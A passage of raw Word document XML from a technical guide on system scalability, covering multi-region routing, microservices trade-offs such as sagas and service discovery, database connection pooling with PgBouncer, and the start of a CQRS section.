    <w:p w14:paraId="78EF362C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Users who travel: must route to correct region regardless of current location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE2961" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cross-region data access: a US user messaging an EU user requires cross-region communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086173A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Global aggregations: "total revenue" requires querying all regions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335CD43" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="02DB61EF">
          <v:rect id="_x0000_i2295" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="621037DD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Microservices as a Scalability Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BFFCA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 How Microservices Enable Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD0AE71" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The monolith scalability problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0F886" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A monolithic application handles user authentication, product search, order processing, and recommendations all in one deployable unit. To scale "search" (which is CPU-intensive), you must scale the entire monolith — including the low-traffic "authentication" module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AED7E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microservices solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5745D92F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each service is independently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA9B4D2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deployed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Change the recommendation algorithm without touching orders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628AA079" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaled:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Scale the search service to 50 instances while authentication stays at 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B2708" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resourced:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Give the search service GPU instances; give the auth service small memory-optimized instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27555F62" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stored:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Search uses Elasticsearch; orders use PostgreSQL; recommendations use a graph database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113907A6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 The Scalability Costs of Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E72500" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65834598" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>What was a function call (nanoseconds) becomes a network call (milliseconds). A single user request might traverse 10 services. If each adds 2ms of network overhead, that's 20ms of pure network tax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7811B4D4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data consistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A531656" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A monolith with one database can use ACID transactions. With microservices, each owning its own database, cross-service consistency requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CBBAE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Saga pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A sequence of local transactions with compensating actions for rollback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208E543" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eventual consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Accept that systems will be temporarily inconsistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50407C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The saga pattern internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6CCB5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Example — placing an order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA818AB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Order Service: create order (status: PENDING).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C71497" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Payment Service: charge credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6DAEBD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Inventory Service: reserve stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D53FE2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Order Service: mark order CONFIRMED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650095EB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If step 3 fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628449E3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Compensating action for step 2: refund credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08136A6D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Compensating action for step 1: cancel order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE68CB8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This is coordinated via events (choreography) or a central coordinator (orchestration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B166BC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service discovery overhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBEDF63" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>With hundreds of services, how does Service A find Service B?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8CAF6E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client-side discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Service A queries a registry (Consul, etcd) for Service B's addresses. Caches locally. Performs client-side load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F330054" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server-side discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Service A calls a known load balancer/gateway. The gateway routes to Service B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0698A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service mesh (Istio/Linkerd):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A sidecar proxy handles all network communication. Service A just calls localhost; the proxy handles discovery, load balancing, retries, circuit breaking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD907F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="3548C92B">
          <v:rect id="_x0000_i2296" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D4F45" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Connection Pooling and Resource Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF70314" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Why Connections Are a Scalability Bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DD727" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773D88B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each database connection consumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247437C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Memory on the DB server (~5–10 MB per connection in PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F4B09B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A backend process/thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10280BDE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="165"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>File descriptors (OS-level limit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C0A27" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>PostgreSQL's default max connections: 100. At 10 MB each = 1 GB of RAM just for connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE7773" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>If you have 50 application servers, each wanting 20 connections = 1,000 connections. The database can't handle this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71394539" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Connection Pooling — How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21A2BA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level pooling (HikariCP, c3p0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6C9FB2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application maintains a pool of pre-established database connections (e.g., 10 connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38375F9C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When a request needs the database, it borrows a connection from the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5BA562" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>After the query completes, the connection is returned to the pool (not closed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E485E8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If all connections are in use, the request waits (with a timeout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF1DEF0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This helps the application</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (no connection establishment overhead per request) but doesn't solve the total connection count problem when you have many application instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700265DE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proxy-level pooling (PgBouncer, ProxySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270AD6D5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A lightweight proxy sits between applications and the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0737B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Applications open connections to the proxy (cheap, thousands supported).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBB282C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>The proxy maintains a small pool of actual database connections (e.g., 50).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D010ECE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Proxy multiplexes application requests over the limited DB connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1C130" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How PgBouncer multiplexes internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747D2BCC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> One proxy connection = one DB connection for the session lifetime. (Limited benefit.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01061764" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transaction mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A DB connection is assigned only for the duration of a transaction. Between transactions, it's returned to the pool. (Massive efficiency gain — 100 app connections share 10 DB connections.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC088E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Statement mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> DB connection assigned per individual SQL statement. (Most efficient but breaks multi-statement transactions.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A11665" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="445A4B11">
          <v:rect id="_x0000_i2297" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4C15D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Scalability Patterns for Reads vs. Writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DAC7C1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E0F14" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Read and write workloads have fundamentally different characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1305558C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Writes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Need strong consistency, ACID transactions, normalized data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFA92F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
